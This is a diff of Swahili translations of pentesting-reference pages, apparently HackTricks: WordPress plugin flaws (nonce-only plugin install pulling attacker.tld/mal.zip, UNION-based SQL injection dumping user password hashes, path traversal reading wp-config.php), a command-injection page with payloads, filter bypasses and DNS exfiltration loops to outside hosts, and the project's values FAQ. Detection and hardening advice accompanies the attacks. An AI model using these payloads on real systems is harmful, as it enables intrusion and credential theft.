-H 'Content-Type: application/json' \ -H 'Content-Type: application/json' \
--data '{"_nonce":"<weak-pass>","slug":"hello-dolly","source":"https://attacker.tld/mal.zip"}' --data '{"_nonce":"<weak-pass>","slug":"hello-dolly","source":"https://attacker.tld/mal.zip"}'
``` ```
Detection checklist Detection checklist
- REST/AJAX handlers zinazobadilisha plugins/themes kwa kutumia tu wp_verify_nonce()/check_admin_referer() na bila capability check - REST/AJAX handlers that modify plugins/themes with only wp_verify_nonce()/check_admin_referer() and no capability check
- Njia yoyote ya code inayoweka $skip_caps = true baada ya nonce validation - Any code path that sets $skip_caps = true after nonce validation
Hardening Hardening
- Daima tibu nonces kama tokeni za CSRF pekee; lazimisha capability checks bila kujali hali ya nonce - Always treat nonces as CSRF tokens only; enforce capability checks regardless of nonce state
- Lazimisha current_user_can('install_plugins') na current_user_can('activate_plugins') kabla ya kufikia installer code - Require current_user_can('install_plugins') and current_user_can('activate_plugins') before reaching installer code
- Kataa ufikiaji usioathibitishwa; epuka kufichua nopriv AJAX actions kwa mifereji inayohitaji ruhusa - Reject unauthenticated access; avoid exposing nopriv AJAX actions for privileged flows
--- ---
## SQLi bila uthibitisho kupitia parameter ya s (search) katika depicter-* actions (Depicter Slider ≤ 3.6.1) ## SQLi isiyothibitishwa kupitia parameta s (search) katika depicter-* actions (Depicter Slider ≤ 3.6.1)
Vitendo kadhaa za depicter-* zilitumia parameter s (search) na kuichanganya ndani ya maswali ya SQL bila parameterization. Actions nyingi za depicter-* zilitumia parameta s (search) na kuiiunganisha katika SQL queries bila parameterization.
- Kigezo: s (search) - Parameter: s (search)
- Hitilafu: kuunganisha mnyororo wa maandishi moja kwa moja katika WHERE/LIKE clauses; hakuna prepared statements/sanitization - Flaw: direct string concatenation in WHERE/LIKE clauses; no prepared statements/sanitization
- Athari: database exfiltration (users, hashes), lateral movement - Impact: database exfiltration (users, hashes), lateral movement
PoC PoC
```bash ```bash
@ -812,38 +812,38 @@ curl -G "https://victim.tld/wp-admin/admin-ajax.php" \
--data-urlencode 'action=depicter_search' \ --data-urlencode 'action=depicter_search' \
--data-urlencode "s=' UNION SELECT user_login,user_pass FROM wp_users-- -" --data-urlencode "s=' UNION SELECT user_login,user_pass FROM wp_users-- -"
``` ```
Detection checklist Orodha ya ugunduzi
- Grep for depicter-* action handlers and direct use of $_GET['s'] or $_POST['s'] in SQL - Tumia grep kutafuta depicter-* action handlers na matumizi ya moja kwa moja ya $_GET['s'] au $_POST['s'] katika SQL
- Pitia custom queries zinazopitishwa kwa $wpdb->get_results()/query() zinazochanganya s - Pitia custom queries zinazopitishwa kwa $wpdb->get_results()/query() zinazochanganya s
Hardening Kuimarisha
- Tumia kila mara $wpdb->prepare() au wpdb placeholders; kataa metacharacters zisizotarajiwa upande wa server - Daima tumia $wpdb->prepare() au wpdb placeholders; kataza metacharacters zisizotarajiwa upande wa server
- Ongeza allowlist kali kwa s na linganisha hadi charset/length inayotarajiwa - Ongeza strict allowlist kwa s na normaliza kwa charset/urefu unaotarajiwa
--- ---
## Unauthenticated Local File Inclusion via unvalidated template/file path (Kubio AI Page Builder ≤ 2.5.1) ## Unauthenticated Local File Inclusion kupitia njia ya template/file isiyotathminiwa (Kubio AI Page Builder ≤ 2.5.1)
Kukubali paths zinazosimamiwa na mshambuliaji katika parameter ya template bila normalisation/containment kunaruhusu kusoma faili za ndani yoyote, na wakati mwingine code execution ikiwa faili za PHP/log zinazoweza kujumuishwa zitaletwa wakati wa runtime. Kukubali attacker-controlled paths katika kigezo cha template bila normalization/containment kunaruhusu kusoma faili za ndani kwa hiari, na wakati mwingine code execution ikiwa faili za PHP/log zinazoweza kuingizwa zinachukuliwa wakati wa runtime.
- Parameter: __kubio-site-edit-iframe-classic-template - Kigezo: __kubio-site-edit-iframe-classic-template
- Flaw: hakuna normalisation/allowlisting; traversal umewezekana - Hitilafu: hakuna normalization/allowlisting; traversal inaruhusiwa
- Impact: ufichuaji wa siri (wp-config.php), uwezekano wa RCE katika mazingira maalum (log poisoning, includable PHP) - Athari: ufichaji wa siri (wp-config.php), uwezekano wa RCE katika mazingira maalum (log poisoning, includable PHP)
PoC soma wp-config.php PoC soma wp-config.php
```bash ```bash
curl -i "https://victim.tld/?__kubio-site-edit-iframe-classic-template=../../../../wp-config.php" curl -i "https://victim.tld/?__kubio-site-edit-iframe-classic-template=../../../../wp-config.php"
``` ```
Orodha ya utambuzi Detection checklist
- Any handler anayechanganya request paths ndani ya include()/require()/read sinks bila realpath() containment - Handler yoyote anayechanganya request paths katika include()/require()/read sinks bila realpath() containment
- Tafuta traversal patterns (../) zinazofikia nje ya templates directory iliyokusudiwa - Angalia traversal patterns (../) zinazofikia nje ya intended templates directory
Uimarishaji Hardening
- Lazimisha allowlisted templates; tatua kwa realpath() na require str_starts_with(realpath(file), realpath(allowed_base)) - Hakikisha allowlisted templates; tatua kwa realpath() na require str_starts_with(realpath(file), realpath(allowed_base))
- Normaliza input; kataa traversal sequences na absolute paths; tumia sanitize_file_name() only for filenames (not full paths) - Normalize input; kataa traversal sequences na absolute paths; tumia sanitize_file_name() tu kwa filenames (si full paths)
## Marejeo ## Marejeleo
- [Unauthenticated Arbitrary File Deletion Vulnerability in Litho Theme](https://patchstack.com/articles/unauthenticated-arbitrary-file-delete-vulnerability-in-litho-the/) - [Unauthenticated Arbitrary File Deletion Vulnerability in Litho Theme](https://patchstack.com/articles/unauthenticated-arbitrary-file-delete-vulnerability-in-litho-the/)
- [Multiple Critical Vulnerabilities Patched in WP Job Portal Plugin](https://patchstack.com/articles/multiple-critical-vulnerabilities-patched-in-wp-job-portal-plugin/) - [Multiple Critical Vulnerabilities Patched in WP Job Portal Plugin](https://patchstack.com/articles/multiple-critical-vulnerabilities-patched-in-wp-job-portal-plugin/)

52
src/pentesting-web/command-injection.md
View File

@ -4,11 +4,11 @@
## Je, command Injection ni nini? ## Je, command Injection ni nini?
A **command injection** inaruhusu utekelezaji wa amri zozote za mfumo wa uendeshaji na mshambuliaji kwenye seva inayoweka application. Kwa matokeo, application na data zake zote zinaweza kuathiriwa/kukomeshwa kabisa. Utekelezaji wa amri hizi kawaida humruhusu mshambuliaji kupata ufikiaji usioidhinishwa au udhibiti wa mazingira ya application na mfumo wa msingi. A **command injection** inaruhusu utekelezaji wa amri yoyote za operating system na attacker kwenye server inayohifadhi application. Kwa matokeo, application na data yake yote zinaweza kuchukuliwa kabisa. Utekelezaji wa hizi commands kawaida humruhusu attacker kupata ufikiaji usioruhusiwa au udhibiti wa environment ya application na system inayokua chini yake.
### Muktadha ### Muktadha
Kutegemea **mahali pembejeo zako zinaingizwa**, huenda ukahitaji **kumaliza muktadha uliomo ndani ya nukuu** (ukitumia `"` au `'`) kabla ya amri. Kutegemea **mahali ambako input yako inaingizwa** unaweza kuhitaji **kumaliza muktadha uliomo ndani ya nukuu** (kutumia `"` au `'`) kabla ya commands.
## Command Injection/Execution ## Command Injection/Execution
```bash ```bash
@ -30,9 +30,9 @@ ls${LS_COLORS:10:1}${IFS}id # Might be useful
> /var/www/html/out.txt #Try to redirect the output to a file > /var/www/html/out.txt #Try to redirect the output to a file
< /etc/passwd #Try to send some input to the command < /etc/passwd #Try to send some input to the command
``` ```
### **Kizuizi** Bypasses ### **Limition** Bypasses
Ikiwa unajaribu kutekeleza **amri yoyote ndani ya mashine ya linux** utavutiwa kusoma kuhusu **Bypasses** hizi: Ikiwa unajaribu kutekeleza **amri yoyote ndani ya mashine ya linux** utapenda kusoma kuhusu **Bypasses:**
{{#ref}} {{#ref}}
@ -47,7 +47,7 @@ vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod
``` ```
### Vigezo ### Vigezo
Hapa kuna vigezo 25 bora vinavyoweza kuwa hatarini kwa code injection na udhaifu za RCE yanayofanana (kutoka [link](https://twitter.com/trbughunters/status/1283133356922884096)): Hapa kuna vigezo 25 bora vinavyoweza kuwa hatarini kwa code injection na udhaifu mwingine wa RCE (kutoka kwa [link](https://twitter.com/trbughunters/status/1283133356922884096)):
``` ```
?cmd={payload} ?cmd={payload}
?exec={payload} ?exec={payload}
@ -75,9 +75,9 @@ Hapa kuna vigezo 25 bora vinavyoweza kuwa hatarini kwa code injection na udhaifu
?run={payload} ?run={payload}
?print={payload} ?print={payload}
``` ```
### Utoaji wa data unaotegemea wakati ### Time based data exfiltration
Kutoa data: herufi kwa herufi Kuchukua data: herufi kwa herufi
``` ```
swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real 0m5.007s real 0m5.007s
@ -91,7 +91,7 @@ sys 0m0.000s
``` ```
### DNS based data exfiltration ### DNS based data exfiltration
Inatokana na zana kutoka `https://github.com/HoLyVieR/dnsbin` pia imehifadhiwa kwenye dnsbin.zhack.ca Inategemea zana kutoka kwa `https://github.com/HoLyVieR/dnsbin`, pia inapatikana kwenye dnsbin.zhack.ca
``` ```
1. Go to http://dnsbin.zhack.ca/ 1. Go to http://dnsbin.zhack.ca/
2. Execute a simple 'ls' 2. Execute a simple 'ls'
@ -101,12 +101,12 @@ for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
``` ```
$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il) $(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)
``` ```
Zana za mtandaoni za kuangalia kuondolewa kwa data kwa kutumia DNS: Zana mtandaoni za kuangalia DNS based data exfiltration:
- dnsbin.zhack.ca - dnsbin.zhack.ca
- pingb.in - pingb.in
### Kupita kando kwa vichujio ### Kuepuka vichujio
#### Windows #### Windows
``` ```
@ -122,7 +122,7 @@ powershell C:**2\n??e*d.*? # notepad
### Node.js `child_process.exec` vs `execFile` ### Node.js `child_process.exec` vs `execFile`
Unapofanya ukaguzi wa back-ends za JavaScript/TypeScript, mara nyingi utakutana na Node.js `child_process` API. Unapofanya ukaguzi wa back-end za JavaScript/TypeScript, mara nyingi utakutana na Node.js `child_process` API.
```javascript ```javascript
// Vulnerable: user-controlled variables interpolated inside a template string // Vulnerable: user-controlled variables interpolated inside a template string
const { exec } = require('child_process'); const { exec } = require('child_process');
@ -130,9 +130,9 @@ exec(`/usr/bin/do-something --id_user ${id_user} --payload '${JSON.stringify(pay
/* … */ /* … */
}); });
``` ```
`exec()` huanzisha **shell** (`/bin/sh -c`), kwa hivyo herufi/alama yoyote yenye maana maalum kwa shell (back-ticks, `;`, `&&`, `|`, `$()`, …) itasababisha **command injection** wakati pembejeo ya mtumiaji inapoambatanishwa ndani ya string. `exec()` inazindua **shell** (`/bin/sh -c`), hivyo alama yoyote yenye maana maalum kwa shell (back-ticks, `;`, `&&`, `|`, `$()`, …) itasababisha **command injection** wakati ingizo la mtumiaji linapounganishwa kwenye string.
**Kudhibiti:** tumia `execFile()` (au `spawn()` bila chaguo la `shell`) na utoe **kila argument kama kipengele tofauti cha array** ili hakuna shell ihusishwe: **Mitigation:** tumia `execFile()` (au `spawn()` bila chaguo la `shell`) na toa **kila argument kama kipengele tofauti cha array** ili hakuna shell ihusike:
```javascript ```javascript
const { execFile } = require('child_process'); const { execFile } = require('child_process');
execFile('/usr/bin/do-something', [ execFile('/usr/bin/do-something', [
@ -140,25 +140,25 @@ execFile('/usr/bin/do-something', [
'--payload', JSON.stringify(payload) '--payload', JSON.stringify(payload)
]); ]);
``` ```
Real-world case: *Synology Photos* ≤ 1.7.0-0794 ilikuwa inaweza kutumiwa kupitia tukio la WebSocket lisilotambuliwa ambalo liliweka data iliyodhibitiwa na mshambuliaji ndani ya `id_user` ambayo baadaye iliingizwa katika wito wa `exec()`, ikafanikisha RCE (Pwn2Own Ireland 2024). Real-world case: *Synology Photos* ≤ 1.7.0-0794 ilitumiwa kupitia tukio la WebSocket lisilo na uthibitisho ambalo liliweka data inayodhibitiwa na mshambuliaji ndani ya `id_user` ambayo baadaye iliingizwa katika wito wa `exec()`, ikiwaleta RCE (Pwn2Own Ireland 2024).
### Uingizaji wa Argument/Option kupitia hyphen ya mwanzoni (argv, no shell metacharacters) ### Argument/Option injection via leading hyphen (argv, no shell metacharacters)
Si uingizaji wote unahitaji shell metacharacters. Ikiwa programu inapitisha nyimbo zisizotegemewa kama hoja kwa utility ya mfumo (hata kwa `execve`/`execFile` na bila shell), programu nyingi bado zitatafsiri hoja yoyote inaanza na `-` au `--` kama chaguo. Hii inampa mshambuliaji nafasi ya kubadili hali, kubadilisha njia za output, au kuanzisha tabia hatari bila hata kuingia kwenye shell. Sio injection zote zinahitaji meta-herufi za shell. Ikiwa programu inapitisha nadharia zisizotegemewa kama hoja kwa utility ya mfumo (hata kwa kutumia `execve`/`execFile` na bila shell), programu nyingi bado zitatafsiri hoja yoyote inaanza na `-` au `--` kuwa chaguo. Hii inamwezesha mshambuliaji kubadili mode, kubadilisha njia za pato, au kusababisha tabia hatarishi bila hata kuingia kwenye shell.
Maeneo yanayojitokeza kawaida: Mahali pa kawaida ambapo hili huonekana:
- UI za wavuti zilizojengwa/CGI handlers ambazo hujenga amri kama `ping <user>`, `tcpdump -i <iface> -w <file>`, `curl <url>`, etc. - Embedded web UIs/CGI handlers zinazojenga amri kama `ping <user>`, `tcpdump -i <iface> -w <file>`, `curl <url>`, n.k.
- Router za CGI zilizosimamiwa kwa pamoja (mfano, `/cgi-bin/<something>.cgi` na parameter ya selector kama `topicurl=<handler>`) ambapo handlers nyingi zinatumia validator dhaifu ile ile. - Centralized CGI routers (mfano, `/cgi-bin/<something>.cgi` na parameter ya selector kama `topicurl=<handler>`) ambapo handlers nyingi zinatumia validator dhaifu ile ile.
Nini cha kujaribu: Nini cha kujaribu:
- Toa thamani zinazotangulia na `-`/`--` ili zitumiwe kama flags na zana ya downstream. - Toa thamani zinazotangulia na `-`/`--` zitakazotumiwa kama flags na chombo kinachofuata.
- Tumia vibaya flags ambazo hubadilisha tabia au kuandika faili, kwa mfano: - Tumia vibaya flags zinazobadilisha tabia au kuandika faili, kwa mfano:
- `ping`: `-f`/`-c 100000` kuumiza kifaa (DoS) - `ping`: `-f`/`-c 100000` kustresha kifaa (DoS)
- `curl`: `-o /tmp/x` kuandika njia yoyote, `-K <url>` kuingiza config inayodhibitiwa na mshambuliaji - `curl`: `-o /tmp/x` kuandika njia yoyote, `-K <url>` kupakia config inayodhibitiwa na mshambuliaji
- `tcpdump`: `-G 1 -W 1 -z /path/script.sh` kupata utekelezwaji baada ya rotate katika wrappers zisizo salama - `tcpdump`: `-G 1 -W 1 -z /path/script.sh` kupata post-rotate execution katika wrappers zisizo salama
- Iki programu inasaidia `--` end-of-options, jaribu kuiepuka mbinu za msingi za kuzuia zinazoweka `--` mahali pasipo sahihi. - Ikiwa programu inaunga mkono `--` end-of-options, jaribu kuizidi mitigations za kawaida ambazo zinaweka `--` mahali pasipofaa.
Generic PoC shapes against centralized CGI dispatchers: Generic PoC shapes against centralized CGI dispatchers:
``` ```
@ -171,7 +171,7 @@ topicurl=<handler>&param=-n
# Unauthenticated RCE when a handler concatenates into a shell # Unauthenticated RCE when a handler concatenates into a shell
topicurl=setEasyMeshAgentCfg&agentName=;id; topicurl=setEasyMeshAgentCfg&agentName=;id;
``` ```
## Orodha ya Ugundaji ya Brute-Force ## Orodha ya Ugundaji wa Brute-Force
{{#ref}} {{#ref}}

118
src/welcome/hacktricks-values-and-faq.md
View File

@ -1,21 +1,21 @@
# Thamani za HackTricks & FAQ # Maadili ya HackTricks & FAQ
{{#include ../banners/hacktricks-training.md}} {{#include ../banners/hacktricks-training.md}}
## Thamani za HackTricks ## Maadili ya HackTricks
> [!TIP] > [!TIP]
> Hizi ndio **thamani za Mradi wa HackTricks**: > Haya ndio **maadili ya Mradi wa HackTricks**:
> >
> - Toa upatikanaji wa **BILA MALIPO** kwa rasilimali za **elimu za hacking** kwa **mtandao wote**. > - Toa **UPATAKAJI WA BURE** wa rasilimali za **hacking za KITAALUMA** kwa **INTANETI YOTE**.
> - Hacking ni kuhusu kujifunza, na kujifunza kunapaswa kuwa kwa bure kadri inavyowezekana. > - Hacking ni kuhusu kujifunza, na kujifunza kunapaswa kuwa bure kadri iwezekanavyo.
> - Lengo la kitabu hiki ni kuitumikia kama rasilimali ya kina ya **elimu**. > - Madhumuni ya kitabu hiki ni kuhudumia kama **chanzo kamili cha kielimu**.
> - **Hifadhi** mbinu za kupendeza za **hacking** ambazo jamii inazichapisha na kuwapa **MAWANDISHI WA ASILI** wote **mikopo**. > - **HIFADHI** mbinu za kushangaza za **hacking** ambazo jamii inazochapisha ikiwapa **WAANDISHI WA ASILI** sifa zote.
> - **Hatuotaki sifa kutoka kwa watu wengine**, tunataka tu kuhifadhi trick nzuri kwa kila mtu. > - **Hatutaki sifa za watu wengine**, tunataka tu kuhifadhi mbinu nzuri kwa kila mtu.
> - Pia tunaandika **tafiti zetu** kwenye HackTricks. > - Pia tunaandika **tafiti zetu** katika HackTricks.
> - Katika kesi kadhaa tutaandika tu **katika HackTricks muhtasari wa sehemu muhimu** za mbinu na tuta**hamasisha msomaji atembelee chapisho la asili** kwa maelezo zaidi. > - Katika visa kadhaa tutataja tu **muhtasari wa sehemu muhimu** za mbinu katika HackTricks na tutamweka **msomaji atembee kwenye chapisho la asili** kwa maelezo zaidi.
> - **PANGA** mbinu zote za **hacking** kwenye kitabu ili ziwe **RAHISI KUPATIKANA ZAIDI** > - **PANGA** mbinu zote za **hacking** katika kitabu ili ziwe **RAHI KUPATIKANA**
> - Timu ya HackTricks imejitolea maelfu ya masaa bila malipo **tu kupanga maudhui** ili watu waweze **kujifunza kwa haraka** > - Timu ya HackTricks imejitolea maelfu ya saa bure **kwa ajili tu ya kupanga yaliyomo** ili watu wajifunze kwa haraka zaidi
<figure><img src="../images/hack tricks gif.gif" alt="" width="375"><figcaption></figcaption></figure> <figure><img src="../images/hack tricks gif.gif" alt="" width="375"><figcaption></figcaption></figure>
@ -23,35 +23,35 @@
> [!TIP] > [!TIP]
> >
> - **Asante sana kwa rasilimali hizi, ninawezaje kuwashukuru?** > - **Asante sana kwa rasilimali hizi, naweza kuwashukuru vipi?**
Unaweza kumshukuru kwa umma timu za HackTricks kwa kuandaa rasilimali hizi zote kwa kuchapisha tweet ukimtaja [**@hacktricks_live**](https://twitter.com/hacktricks_live).\ Unaweza kuwashukuru hadharani timu ya HackTricks kwa kupanga rasilimali hizi kwa kuchapisha tweet ukimtaja [**@hacktricks_live**](https://twitter.com/hacktricks_live).\
Ikiwa umewashukuru sana unaweza pia [**kufadhili mradi hapa**](https://github.com/sponsors/carlospolop).\ Ikiwa una shukrani za kipekee unaweza pia [**kufadhili mradi hapa**](https://github.com/sponsors/carlospolop).\
Na usisahau **kuweka nyota kwenye miradi ya Github!** (Tafuta viungo hapa chini). Na usisahau **kutoa nyota kwenye miradi ya Github!** (Angalia viungo hapo chini).
> [!TIP] > [!TIP]
> >
> - **Ninawezaje kuchangia mradi?** > - **Ninaweza kuchangia mradi vipi?**
Unaweza **share new tips and tricks with the community or fix bugs** unazopata katika vitabu kwa kutuma **Pull Request** kwa kurasa husika za Github: Unaweza **kushiriki vidokezo vipya na mbinu na jamii au kurekebisha bugs** unazopata katika vitabu kwa kutuma **Pull Request** kwa kurasa husika za Github:
- https://github.com/carlospolop/hacktricks - [https://github.com/carlospolop/hacktricks](https://github.com/carlospolop/hacktricks)
- https://github.com/carlospolop/hacktricks-cloud - [https://github.com/carlospolop/hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)
Usisahau **kuweka nyota kwenye miradi ya Github!** Usisahau **kutoa nyota kwenye miradi ya Github!**
> [!TIP] > [!TIP]
> >
> - **Naweza kunakili baadhi ya maudhui kutoka HackTricks na kuyaweka kwenye blogu yangu?** > - **Je, ninaweza kunakili baadhi ya yaliyomo kutoka HackTricks na kuyaweka kwenye blogu yangu?**
Ndiyo, unaweza, lakini **usisahau kutaja kiungo/viungo maalum** ambavyo maudhui yalichukuliwa kutoka. Ndiyo, unaweza, lakini **usisahau kutaja kiungo maalum ambapo yaliyomo yalichukuliwa**.
> [!TIP] > [!TIP]
> >
> - **Ninawezaje kurejea ukurasa wa HackTricks?** > - **Ninawezaje kurejelea ukurasa wa HackTricks?**
Mradi tu kiungo **cha** ukurasa(au kurasa) ulizotumia taarifa kutoka kinaonekana inatosha.\ Iwapo kiungo cha ukurasa(au kurasa) ambako ulipata taarifa kinaonekana basi hiyo inatosha.\
Ukihitaji bibtex unaweza kutumia kitu kama: Ikiwa unahitaji bibtex unaweza kutumia kitu kama:
```latex ```latex
@misc{hacktricks-bibtexing, @misc{hacktricks-bibtexing,
author = {"HackTricks Team" or the Authors name of the specific page/trick}, author = {"HackTricks Team" or the Authors name of the specific page/trick},
@ -62,82 +62,82 @@ url = {\url{https://book.hacktricks.wiki/specific-page}},
``` ```
> [!WARNING] > [!WARNING]
> >
> - **Naweza kunakili HackTricks zote kwenye blogi yangu?** > - **Je, ninaweza kunakili HackTricks yote kwenye blogu yangu?**
**Ningependelea si.** Hiyo **haitamfaidi mtu yeyote** kwa sababu **maudhui yote tayari yamo hadharani** katika vitabu rasmi vya HackTricks kwa **bure**. **Napendelea sio hivyo**. Hii **haitamfaa mtu yeyote** kwa kuwa yaliyomo yote tayari **yapo hadharani** katika vitabu rasmi vya **HackTricks** kwa **bure**.
Ikiwa una hofu kwamba yatafifia, fanya tu fork kwenye Github au jipakue; kama nilivyosema tayari ni bure. Ikiwa unaogopa kwamba yatafifia, fanya fork kwenye Github au uyapakue; kama nilivyosema, tayari ni bure.
> [!WARNING] > [!WARNING]
> >
> - **Kwa nini mna sponsors? Je, vitabu vya HackTricks vimetengenezwa kwa madhumuni ya kibiashara?** > - **Kwa nini mna wafadhili? Je, vitabu vya HackTricks vimeundwa kwa madhumuni ya kibiashara?**
Thamani ya kwanza ya **HackTricks** ni kutoa rasilimali za elimu ya **hacking** ZA **BURE** kwa **WOTE** duniani. Timu ya HackTricks imejitolea maelfu ya saa kutoa maudhui haya, tena, kwa **BURE**. Thamani ya kwanza ya **HackTricks** ni kutoa rasilimali za kielimu za hacking kwa **BURE** kwa **WOTE** ulimwenguni. Timu ya **HackTricks** imeweka **maelfu ya masaa** kutoa yaliyomo haya, tena, kwa **BURE**.
Ikiwa unafikiri vitabu vya HackTricks vimetengenezwa kwa **madhumuni ya kibiashara** uko **KOSA KABISA**. Ikiwa unadhani vitabu vya **HackTricks** vimetengenezwa kwa **madhumuni ya kibiashara** uko **UMEKOSEA KABISA**.
Tuna sponsors kwa sababu, hata kama maudhui yote ni ZA **BURE**, tunataka kutoa jamii uwezekano wa kuthamini kazi yetu ikiwa wanaona inafaa. Kwa hiyo, tunawapa watu chaguo la kuchangia HackTricks kupitia [**Github sponsors**](https://github.com/sponsors/carlospolop), na kampuni zinazohusiana na cybersecurity kushirikiana na HackTricks na kuweka baadhi ya matangazo katika kitabu, huku matangazo hayo yakiwa yamewekwa sehemu zinazoonekana lakini **hazivurugi** mchakato wa kujifunza ikiwa mtu anazingatia maudhui. Tuna wafadhili kwa sababu, hata kama yaliyomo yote ni **BURE**, tunataka **kuwaruhusu watu jumuiya kutendea kazi yetu shukrani** ikiwa watataka. Kwa hivyo, tunawawezesha watu kuchangia HackTricks kupitia [**Github sponsors**](https://github.com/sponsors/carlospolop), na kampuni zinazohusiana na usalama wa mtandao kuchangia HackTricks na **kuwa na matangazo** kwenye kitabu, ambapo **matangazo** hayo hupangwa mahali yanayoonekana lakini **hayavurugi mchakato wa kujifunza** ikiwa mtu anazingatia yaliyomo.
Hautapokea HackTricks ikiwa imejazwa na matangazo yanayekera kama blogi nyingine zenye maudhui kidogo kuliko HackTricks, kwa sababu HackTricks haijatengenezwa kwa madhumuni ya kibiashara. Hautapata HackTricks imejaa matangazo yanayokasirisha kama blogu zingine zenye yaliyomo kidogo zaidi kuliko HackTricks, kwa sababu HackTricks haijatengenezwa kwa madhumuni ya kibiashara.
> [!CAUTION] > [!CAUTION]
> >
> - **Nifanye nini ikiwa ukurasa wa HackTricks umejengwa kwa msingi wa chapisho langu la blogi lakini haujatajwa chanzo?** > - **Nifanye nini ikiwa ukurasa fulani wa HackTricks umejengwa kwa kutumia chapisho langu la blogu lakini haujatajwa?**
**Tunasikitika sana. Hii haipaswi kutokea.** Tafadhali tujulishe kupitia Github issues, Twitter, Discord... kiungo cha ukurasa wa HackTricks wenye maudhui na kiungo cha blogi yako na **tutakagua na kuiongeza ASAP**. **Tunasikitika sana. Hii haipaswi kuwa imekutokea.** Tafadhali tujulishe kupitia Github issues, Twitter, Discord... kiungo cha ukurasa wa HackTricks chenye yaliyomo na kiungo cha blogu yako na **tutakagua na kuiweka HARAKA IWEZAYO**.
> [!CAUTION] > [!CAUTION]
> >
> - **Nifanye nini ikiwa kuna maudhui kutoka blogi yangu kwenye HackTricks na sitaki yawepo hapo?** > - **Nifanye nini ikiwa kuna yaliyomo kutoka kwenye blogu yangu katika HackTricks na sitaki yawepo hapo?**
Kumbuka kwamba kuwa na viungo kwenye ukurasa wako katika HackTricks: Kumbuka kuwa kuwa na viungo vya ukurasa wako ndani ya HackTricks:
- Huboresha **SEO** yako - Kuboresha **SEO** yako
- Maudhui yanapata **kutafsiriwa katika lugha zaidi ya 15** na hivyo kuwawezesha watu wengi zaidi kuyapata - Yaliyomo yanatafsiriwa hadi **lugha zaidi ya 15**, hivyo kuwezesha watu wengi zaidi kupata yaliyomo haya
- **HackTricks inahimiza** watu **kuangalia ukurasa wako** (watu kadhaa wametujulisha kwamba tangu ukurasa wao uanze kuwepo katika HackTricks wamepata ziara nyingi zaidi) - **HackTricks inahimiza** watu **kukagua ukurasa wako** (watu kadhaa wamesema tangu kurasa zao ziwepo HackTricks wamepata ziara zaidi)
Hata hivyo, ikiwa bado unataka maudhui ya blogi yako yatoweke, tujulishe na bila shaka **tutaondoa kila kiungo kwa blogi yako**, na maudhui yoyote yaliyojengwa kutokana nayo. Hata hivyo, ikiwa bado unataka yaliyomo ya blogu yako yaondolewe kutoka HackTricks, tujulishe tu na tutafuta dhamana ya **kuondoa kila kiungo cha blogu yako**, na yoyote yaliyomo yanayotokana nayo.
> [!CAUTION] > [!CAUTION]
> >
> - **Nifanye nini nikigundua maudhui yaliyopakuliwa (copy-pasted) kwenye HackTricks?** > - **Nifanye nini nikigundua yaliyomo yaliyonakiliwa (copy-pasted) katika HackTricks?**
Daima **tunamtoa mwandishi wa asili sifa zote**. Ikiwa unapata ukurasa wenye maudhui yaliyopakuliwa bila chanzo cha asili kurejelewa, tujulishe na sisi tutafanya mojawapo ya yafuatayo: **tutaiondoa**, **tutaongeza kiungo kabla ya maandishi**, au **tutairekebisha kwa kuiongeza kiungo**. Daima tunatoa **sifa zote kwa waandishi wa asili**. Ikiwa utapata ukurasa ulio na yaliyomo yaliyonakiliwa bila marejeo ya chanzo asilia, tujulishe na tutafanya mojawapo ya yafuatayo: **kuondoa**, **kuongeza kiungo kabla ya maandishi**, au **kuandika upya tukiongeza kiungo**.
## LESENI ## LICENSE
Hakimiliki © Haki zote zimehifadhiwa isipokuwa ilivyoainishwa vinginevyo. Hakimiliki © Haki zote zimehifadhiwa isipokuwa ilivyoainishwa vinginevyo.
#### Muhtasari wa Leseni: #### Muhtasari wa Leseni:
- Utambulisho: Una uhuru wa: - Attribution: Una uhuru wa:
- Kushiriki — kunakili na kusambaza tena nyenzo kwa njia yoyote au umbizo wowote. - Share — nakili na usambaze tena nyenzo kwa njia yoyote au muundo wowote.
- Kurekebisha — kuchanganya upya, kubadilisha, na kujenga juu ya nyenzo. - Adapt — remix, badilisha, na ujengwa juu ya nyenzo.
#### Masharti ya Ziada: #### Masharti ya Ziada:
- Yaliyomo ya Wahusika Wengine: Sehemu kadhaa za blogi/kitabu hiki zinaweza kujumuisha maudhui kutoka vyanzo vingine, kama vipande kutoka blogi nyingine au machapisho. Matumizi ya maudhui kama haya yanafanywa chini ya kanuni za fair use au kwa idhini ya wazi kutoka kwa wamiliki wa hakimiliki husika. Tafadhali rejea vyanzo vya asili kwa taarifa maalum za leseni kuhusu maudhui ya wahusika wengine. - Maudhui ya Watu wa tatu: Sehemu kadhaa za blogu/kitabu hiki zinaweza kujumuisha maudhui kutoka vyanzo vingine, kama vifupi kutoka blogu au machapisho mengine. Matumizi ya maudhui kama hayo hufanywa kwa misingi ya matumizi ya haki au kwa ruhusa maalum kutoka kwa wamiliki wa hakimiliki. Tafadhali rejea vyanzo vya asili kwa taarifa maalum za leseni zinazohusu maudhui ya watu wa tatu.
- Uandishi: Maudhui ya awali yaliyotungwa na HackTricks yamo chini ya masharti ya leseni hii. Unahimizwa kumtaja mwandishi wakati wa kushiriki au kurekebisha kazi hii. - Uandishi: Yaliyomo ya asili yaliyoandikwa na HackTricks yamo chini ya masharti ya leseni hii. Unahimizwa kumtaja mwandishi unaposhiriki au kubadilisha kazi hii.
#### Msamaha: #### Msamaha:
- Matumizi ya Kibiashara: Kwa maswali kuhusu matumizi ya kibiashara ya maudhui haya, tafadhali wasiliana nami. - Matumizi ya kibiashara: Kwa maswali kuhusu matumizi ya kibiashara ya yaliyomo haya, tafadhali wasiliana nami.
Leseni hii hawaitoi haki yoyote ya alama za biashara au haki za chapa kuhusiana na maudhui. Alama zote za biashara na chapa zilizotajwa katika blogi/kitabu hiki ni mali ya wamiliki wao mtawaliwa. Leseni hii haisomi kama inakupa haki za alama za biashara au umuhimu wa chapa kuhusiana na yaliyomo. Alama zote za biashara na chapa zilizotajwa katika blogu/kitabu hiki ni mali ya wamiliki wao husika.
